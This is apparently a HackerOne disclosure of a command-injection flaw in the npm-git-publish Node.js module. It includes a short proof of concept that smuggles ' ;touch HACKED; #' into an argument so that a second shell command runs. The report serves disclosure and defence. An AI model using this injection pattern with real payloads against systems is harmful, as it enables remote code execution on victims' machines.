Node.js third-party modules: [npm-git-publish] RCE via insecure command formatting

ID H1:730121
Type hackerone
Reporter mik317
Modified 2020-01-11T12:08:21


I would like to report an RCE issue in the npm-git-publish module. It allows arbitrary commands to be executed remotely on the victim's PC.


  • module name: npm-git-publish
  • version: 0.2.4-beta
  • npm page:

Module Description

> Share/publish private packages using Git remotes!

Module Stats

  • [~70] downloads in the last day
  • [268] downloads in the last week
  • [~1k] downloads in the last month

Vulnerability Description

The issue occurs because user input is formatted into a shell command string that is then executed without any check or escaping. The issue arises here:

Steps To Reproduce:

  1. Create the following PoC file:

```js
// poc.js
var git = require('npm-git-publish');
git.publish('.', ' ;touch HACKED; #')
```

  2. Check that there are no files called `HACKED`
  3. Execute the following commands in another terminal:

```bash
npm i npm-git-publish # Install affected module
node poc.js           # Run the PoC
```

  4. Recheck the files: now `HACKED` has been created :) {F626780}


> Don't format commands using insecure user's inputs :)

Supporting Material/References:

  • [NODEJS VERSION]: 10.16.3
  • [NPM VERSION]: 6.0.9

Wrap up

  • I contacted the maintainer to let them know: [N]
  • I opened an issue in the related repository: [N]


